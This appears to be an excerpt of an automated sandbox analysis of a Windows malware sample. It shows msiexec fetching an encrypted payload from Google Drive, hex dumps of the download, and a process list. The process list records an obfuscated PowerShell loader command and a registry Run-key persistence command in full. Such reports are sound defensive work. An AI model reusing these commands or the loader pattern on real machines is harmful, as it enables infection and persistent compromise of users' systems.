"geoplugin_request":"89.187.171.165", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Atlanta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"33.7485", "geoplugin_longitude":"-84.3871", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49714	172.217.215.102	443	5324	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:50:35 UTC	216	OUT	GET /uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-13 07:50:35 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 13 Dec 2024 07:50:35 GMT Location: https://drive.usercontent.google.com/download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-mS-Nb623ddTLkTCfQ63sMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49715	108.177.122.132	443	5324	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:50:36 UTC	258	OUT	GET /download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-13 07:50:38 UTC	4927	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC7D81p53FruwEMC5BP-kUlmZIAO-gKXnnYqvZx_asb4oD07JG1MYp0rquLk6BF8WLat Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="thanks.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 494656 Last-Modified: Tue, 22 Oct 2024 08:22:34 GMT Date: Fri, 13 Dec 2024 07:50:38 GMT Expires: Fri, 13 Dec 2024 07:50:38 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=sfsDdA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-13 07:50:39 UTC	4927	IN	Data Raw: b7 c5 65 ef c5 97 12 70 c4 41 22 41 4c 0a 8f 5b 0d 7b a4 ca 19 2d f1 5a 92 6c 87 92 d8 4a 31 77 ab c9 59 ac be 78 09 ac e3 2a c6 25 10 ef 52 c3 52 da 99 ca 42 e7 75 03 1b 7e 3c 22 86 db 68 36 46 b4 7a 25 19 b0 51 59 f0 db 85 55 47 ce a2 af d5 8f 94 06 5e 5d ba bd 58 11 40 ca f8 71 1b cf de dc ea 2c 9c c0 04 64 fc 6b 8e 42 d6 2c a5 bf da 84 d1 51 4d 83 25 13 f6 97 2c 6d 71 c2 e0 4b 57 2e 11 3b c1 f7 94 7b a5 9d 7b 2c 20 91 39 30 dc 7d 1a 72 7a 67 e1 5c 72 bb b6 e8 9e c3 21 af 31 4f 1a 03 a8 1d 1f 47 e8 93 1e 89 82 77 01 be d6 cc 7d eb 43 23 05 94 c9 e2 b9 fb c6 f0 bc 20 25 58 ef c1 c6 c2 18 05 27 dd 21 9e a4 48 ed 29 d4 b9 50 45 4e d5 18 04 70 fe 74 36 47 8d 98 55 7b 0a 19 97 3e fe 08 e9 42 d0 8f 05 8b b3 de e1 4d 63 86 af bc e5 39 aa 66 c7 8c ce d7 ce cc Data Ascii: epA"AL[{-ZlJ1wYx*%RRBu~<"h6Fz%QYUG^]X@q,dkB,QM%,mqKW.;{{, 90}rzg\r!1OGw}C# %X'!H)PENpt6GU{>BMc9f
2024-12-13 07:50:39 UTC	4842	IN	Data Raw: 19 74 4f 15 7a f9 ce 0f ad df 06 78 4e 05 15 ef e5 67 66 29 3b b1 2a 5d f0 87 ca 8d 81 08 aa 21 5d f5 ca db 42 8b bb 0d 97 ea a6 9e 73 48 f8 85 03 1f 4e 34 c9 d5 dd 23 75 b2 65 9d 83 2f ec fe e7 2b c2 19 72 40 83 4b 3e 2a 07 da 4f 71 3c d8 29 a3 6e a0 5d c7 d3 13 95 0d ff f2 51 85 62 9f 4d 67 44 07 7d 8f ee fd 34 97 20 a0 3e 2a e4 b2 8a dd ef 37 2c 82 b2 4b c3 68 38 c1 0e d9 58 65 4a 78 5e 49 af 92 aa 38 ab 62 30 d0 4f a2 3e 6f 3a 37 aa e4 c6 02 98 03 96 55 8f e8 68 5a 3c a6 be 06 c5 87 84 0f 20 d4 ae a5 e4 25 36 dc 42 92 c7 be 35 4b 0c 92 42 11 93 47 34 12 b6 06 d3 72 4b ec 31 0f 56 3b ee c6 46 6e ea a1 b2 ea 63 f2 a5 66 a2 2a 5a ca ea 2c af b2 89 f4 6d 01 7d 4c 48 87 f9 88 9f 7d 41 a2 f9 a3 98 af d3 3a d2 6f 90 a1 82 97 d9 d0 8c 62 fd b9 1d 4d c3 83 92 Data Ascii: tOzxNgf);]!]BsHN4#ue/+r@K>Oq<)n]QbMgD}4 >7,Kh8XeJx^I8b0O>o:7UhZ< %6B5KBG4rK1V;FncfZ,m}LH}A:obM
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: 48 25 ae b6 a5 d3 ce 09 d7 7b 7b e1 21 61 55 19 ef d8 5d f2 f2 97 70 a0 21 a2 a1 9d 6c 5c 43 a4 9d a3 b7 ad 94 2a 7c 04 cf b4 48 05 42 ec 5b 03 bf 4d de 73 27 2b 97 2b 7c ef 0f c0 39 00 79 93 ff 46 57 2b 70 b5 91 a5 df 83 32 4a 4a b6 1d 4a 07 21 91 c2 0c eb 6d 87 24 25 21 00 7c 2f e6 8f 8a 74 07 6a 27 ea d8 59 3d 33 85 14 93 4c 12 c5 99 96 15 90 fa 97 a4 6c f4 b8 61 d4 91 fc 75 51 1c 7e 6a aa 47 61 4a b0 93 70 6b 5f 0e d6 74 55 4a ef bf 35 92 71 71 cf 55 12 02 e6 73 3f fb 9b 88 4f 86 aa d4 d2 5a 40 83 d4 5a 9f a5 1f d5 ec 09 1c ea 33 ab c7 e0 18 0f 66 20 c4 29 d0 72 49 7b ae 06 44 fd 3b 75 63 6a 79 1b 89 c6 e0 56 da ec 29 af b3 8b bb 25 c1 12 e4 b6 8e 97 99 95 d6 4c 3a 04 a1 95 b3 9c 76 3f 55 e6 71 32 70 53 5c e9 e2 ec 70 2a a1 ea ad 6c 37 dc 1d de 55 83 Data Ascii: H%{{!aU]p!l\C\|HB[Ms'++\|9yFW+p2JJJ!m$%!\|/tj'Y=3LlauQ~jGaJpk_tUJ5qqUs?OZ@Z3f )rI{D;ucjyV)%L:v?Uq2pS\pl7U
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: 9c 91 b2 f6 00 ec 28 ac 55 70 a7 5b 5e 66 fc 55 95 a4 e9 16 e4 72 22 87 69 56 da 79 e6 01 8d 01 14 38 2c ec 62 d8 c0 ef bf 7f 9f 3a 9b 49 75 77 90 c2 60 3b 68 e3 7b da 49 dc 38 b5 a7 e7 87 bd 4a e0 76 83 77 3f c5 1d 4b 7c d7 0c 00 0a ed 04 2e cd 2f 63 99 ff f3 de 0d ac 1e 68 41 aa 86 98 a0 44 59 d0 d2 a2 4d 8f d6 eb fb e4 04 76 73 a4 e4 65 bd 39 12 12 2f f7 74 d3 be 69 82 28 eb b0 c4 e1 d2 0a a0 b9 a7 5f b3 e3 af 3c d0 3d 24 c5 eb 67 d8 35 d2 e8 a5 fc ab fb 8d c1 56 72 5b 22 fe 4a 2a 35 5b b2 29 62 0a fa 10 bb 69 1e 3a e4 7e a5 c9 99 63 cd 08 fb fb 86 04 9c da f9 d8 ed 31 02 a0 c4 9a 2b 89 89 6b d8 a6 ea c7 a5 dd fa 33 91 8d f9 4b e5 3c 5d 23 ec ad 1b c7 4a eb ae b0 33 57 09 c8 bd d7 59 ba 65 da 1b f8 7a e4 5d fa b1 17 2e eb 07 f5 a3 2d de c1 d1 8c a9 a0 Data Ascii: (Up[^fUr"iVy8,b:Iuw`;h{I8Jvw?K\|./chADYMvse9/ti(_<=$g5Vr["J*5[)bi:~c1+k3K<]#J3WYez].-
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: ad 45 91 59 3d 75 1b 69 de fb 0a 3d de 60 51 61 c3 c7 ac 1c 95 8f f0 53 81 60 af d1 b1 8f 60 b1 d0 f6 f0 90 56 e0 0f 87 45 2b 14 40 1f 9c c7 e0 51 eb f2 88 d6 88 ca 17 46 64 d8 f8 44 bf ff 68 c2 33 be 73 b0 b5 9d 36 30 76 de 69 39 af 98 dd 6c 2e 6d d9 97 cc 7d fb b7 3b dd 76 b6 98 d1 a7 69 6f 2a 2e 29 d9 22 0f fc 83 69 96 89 31 b8 2b 4e d9 43 ce f2 91 cd 74 51 33 aa 3f df ab 5e bf 62 b5 e2 93 b9 53 dd b1 17 d0 83 5d cf 90 1f 39 b0 99 51 91 fb ff 3d d0 a8 18 97 28 28 eb 65 41 e3 d2 fc f7 ff 10 30 8d 11 2c 7e 2d 3a 39 e4 e6 40 11 82 da 7f 39 04 76 47 78 fa 87 32 5c 4b ae bc e1 a6 7e 87 9c 9a 05 3e 46 2f a5 08 93 2e 3a 0f a7 5f 2b 31 e8 61 ad 76 f1 46 d4 63 2c 87 a5 ec ea a2 e0 23 71 28 95 74 df fc 34 78 55 bd e5 be 2d 93 f5 e4 b8 cf 97 ed b5 14 31 dd 20 17 Data Ascii: EY=ui=`QaS``VE+@QFdDh3s60vi9l.m};vio*.)"i1+NCtQ3?^bS]9Q=((eA0,~-:9@9vGx2\K~>F/.:_+1avFc,#q(t4xU-1
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: ed 33 23 6e 1f f5 60 ff 78 79 8d 43 e8 7c f5 4d 17 42 28 ed 81 19 c6 d0 e9 d0 b7 8f 9c 7d b1 77 f2 76 1c 08 c7 59 20 bd d9 a5 0b 3f cc 73 c8 ef 9b 43 cc 7f ad c3 ab 7a 75 ef da 8b 4e ba 49 71 e5 27 ad e7 18 7f 03 f6 cb 1a c2 d0 ef 8d d6 35 2f 90 7d 90 04 b2 06 b8 d1 92 5f c5 a3 6c 40 fa 86 22 9a d8 97 e0 89 b2 27 d6 e7 a8 6e e9 c6 20 22 db 6a 30 c5 51 b0 cd 2c 3b 93 f6 be 74 07 b8 ed 8f 9f c3 57 5e f4 3f 0b f4 48 a0 cb 18 f9 28 5c 64 08 b5 b8 90 d9 47 6b b7 7d 3d 27 01 aa d3 f7 88 79 3c b7 91 ce de b8 0c 37 c8 82 57 18 b9 40 36 3c da 6b 5d b8 28 7b f3 97 c9 40 e7 2b 49 dd 53 55 43 2f 68 02 7b c5 84 00 84 9f 78 b4 dd 88 f0 48 97 71 30 5a e6 fa e0 74 0b a8 99 e4 33 e2 96 f9 1a f0 f7 c8 4b be 8f 86 c1 d1 65 4f ff 21 7b a1 3f 3d 23 29 44 ce e0 cb 07 78 4e ae Data Ascii: 3#n`xyC\|MB(}wvY ?sCzuNIq'5/}_l@"'n "j0Q,;tW^?H(\dGk}='y<7W@6<k]({@+ISUC/h{xHq0Zt3KeO!{?=#)DxN
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: a7 ba 6e 7e 01 b2 44 f8 83 aa b4 5f 59 4e c7 96 30 72 fa fc 7c 8d ce b1 2c fd 44 3b 2c dd 9d 11 e4 8e 5a b3 e4 c1 b9 76 f8 d4 a0 90 4b 30 6d ad ef c0 b4 97 f1 24 d4 1f 67 bb 9f b2 d2 23 d0 21 73 2c 48 24 1c ec 38 d0 9f 9d 1d aa cd 87 7f 3b 95 39 6c 31 09 c4 3e 64 49 14 77 19 1b 00 10 6d 96 27 22 04 97 30 c4 95 5d c1 88 76 79 ba 87 e8 33 de fe 1b 18 08 c6 ee 40 a9 59 72 b2 bf 04 89 f4 e7 6c c1 19 a5 25 37 dd 74 97 c7 55 26 a9 0c 6d 36 66 c9 f8 8e 71 46 8d e8 f5 2e 46 ba 7d 08 a7 ca 43 77 8f 45 58 d3 06 db ae 5c 73 7a 8b db 94 ab ec a3 27 fc 76 93 9c 74 c2 05 4b d2 ad ce 6e ef 0e 07 1a 6f ed 94 e9 ae 94 67 17 fc 1c 47 b9 2c f8 b9 b9 a4 26 46 2c 80 93 1d 60 7a 07 3d 1a 4f 84 9d ee b1 57 ad bb 60 6c 56 1d 37 47 33 21 bb 58 05 bb 0f bf 9d bc 2e f9 dd 7f af 37 Data Ascii: n~D_YN0r\|,D;,ZvK0m$g#!s,H$8;9l1>dIwm'"0]vy3@Yrl%7tU&m6fqF.F}CwEX\sz'vtKnogG,&F,`z=OW`lV7G3!X.7
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: 88 0e 12 a3 f8 92 25 db 02 d8 08 55 75 87 f6 a2 ca b3 b1 91 23 32 ed c7 c6 7c 10 7b d9 73 52 66 4c f6 02 a7 d1 a6 f8 93 5e 7c 36 18 c9 c7 d5 00 b6 a6 cd e9 4c f8 cc f5 17 3d e3 3e 7f cf fa 34 01 39 94 4b 41 a2 5b 72 e3 9e 13 a3 b5 81 44 db f7 17 44 cb e6 13 19 f6 b5 4a 02 f9 cc 89 11 95 f1 1a 12 7f 7a c1 ee b0 89 e5 cf 3d e8 f1 19 0a 24 7f 01 19 61 33 10 d0 14 7d 0c 7f aa 8b f6 f1 b3 78 ff 46 0a 2d 37 f8 c0 61 f4 ba f2 a0 01 f8 ee 3a ed 2a e4 44 5a 3f c8 4f ca b8 41 43 67 da d9 40 68 05 dc 5e 43 1b e6 33 c0 1b d8 78 c6 26 62 54 da 99 e8 a2 75 b3 38 95 03 59 fb 5a 91 c6 25 d2 07 e3 a6 82 4a f0 18 d9 43 3e df 5a 22 30 d7 bc 9f 63 8f 65 eb 5e 03 85 e0 be cc e9 1e 53 15 ea cd 4d fc 0e 31 ec c0 6b c5 9b 93 83 76 2c 50 39 af 98 5c b7 7d 55 1e 13 f6 83 70 25 47 Data Ascii: %Uu#2\|{sRfL^\|6L=>49KA[rDDJz=$a3}xF-7a:*DZ?OACg@h^C3x&bTu8YZ%JC>Z"0ce^SM1kv,P9\}Up%G
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: f5 7e 7a ce d2 04 ee 69 25 49 d6 60 77 d3 12 1b 29 03 fe dd a3 bf f0 84 42 3e e1 6d bc 2c 2b 40 d0 4b e2 64 3b 1f a7 72 9f cf 47 38 58 95 f4 8d 14 6e 1f 40 a5 1c 98 48 0a ca 90 35 4d a2 9a e8 80 4e 13 71 6a 37 1d f6 71 a7 3f 2c 7e b4 30 eb 76 eb 5a c6 10 d1 1f 88 4d f1 ab ee 1e cc ca bd 77 e8 b2 de 34 2c a2 f5 83 76 af 89 0c ac c8 f2 a2 bb 92 d2 88 72 89 56 c5 f0 16 0b 8b 08 08 67 7e c8 2f 83 76 89 82 d2 b9 66 26 d2 76 35 7b a6 da 91 6c 3d 7d d3 dc c2 6c 5a 73 4c d0 ea bf 58 95 92 22 5d c9 0f 38 89 a2 ef 78 be f2 d1 89 f6 f9 6c 22 b3 cd a7 4f ed fa e9 91 13 e2 cd 04 7a 0b 35 7d e1 fa e7 1b f5 a1 7f d4 ad 76 06 3a b2 d7 5f c5 97 a9 c2 bc 5a 7f a4 6f 53 6e 88 fa 32 40 80 6a 4f ea c8 83 b9 28 0f 5e 31 7c 03 71 36 16 9b a1 d6 2f f4 b0 3a 3c 40 b3 85 d9 88 b9 Data Ascii: ~zi%I`w)B>m,+@Kd;rG8Xn@H5MNqj7q?,~0vZMw4,vrVg~/vf&v5{l=}lZsLX"]8xl"Oz5}v:_ZoSn2@jO(^1\|q6/:<@
2024-12-13 07:50:39 UTC	1255	IN	Data Raw: b3 07 c0 1d 6f 73 06 19 e1 4a 55 61 6e a0 14 d0 df 76 2e e7 78 a7 f4 c8 04 93 c7 ef 22 31 59 c9 10 79 87 56 d9 bb e1 25 20 fc a5 f1 7e bc b7 48 0b a0 2f 47 1f 72 2c 43 7f 70 be 4b 8a 63 28 93 62 dc c2 c7 21 d7 98 b5 ce 9b 2d 7b a9 20 8d ad ad 05 0d cd e0 21 ca 93 25 e2 4c a9 7a 45 b6 c0 d1 97 65 95 fd 52 a9 64 f9 fc 57 c9 bb 6e 40 d5 4c 6d aa fa 63 91 10 72 00 5e 80 65 10 e8 5b f2 45 f9 b3 66 92 ef fa fc 3f 9a 6c f5 68 20 e1 47 3b ad 99 15 04 c5 ac 08 2e 40 b3 a1 5d b3 de 5e 82 d5 c0 59 82 0d 45 1a 33 05 be 15 34 eb f0 2a 46 1f a6 61 8e e5 ca 79 9b aa e8 89 4f 50 76 32 b7 9a 6d 56 4d cb 29 51 97 2f e7 f2 ed 20 d4 23 ee 93 ed c5 97 43 9c 3c d0 f1 af 99 19 87 17 e6 81 ae 42 84 a6 af 51 e7 1b 5e df 01 5e ed 5f 24 60 33 10 67 8a c7 c9 ae 6c d2 62 44 ce 26 c5 Data Ascii: osJUanv.x"1YyV% ~H/Gr,CpKc(b!-{ !%LzEeRdWn@Lmcr^e[Ef?lh G;.@]^YE34*FayOPv2mVM)Q/ #C<BQ^^_$`3glbD&

Target ID:	0
Start time:	02:50:08
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\x295IO8kqM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\x295IO8kqM.exe"
Imagebase:	0x400000
File size:	1'044'016 bytes
MD5 hash:	3E4417C519A6DC532E433AD673BFA553
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	02:50:10
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin)
Imagebase:	0x120000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	02:50:10
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66cfd0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	02:50:25
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x950000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	02:50:33
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
Imagebase:	0x890000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	02:50:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66cfd0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	02:50:33
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
Imagebase:	0xdd0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true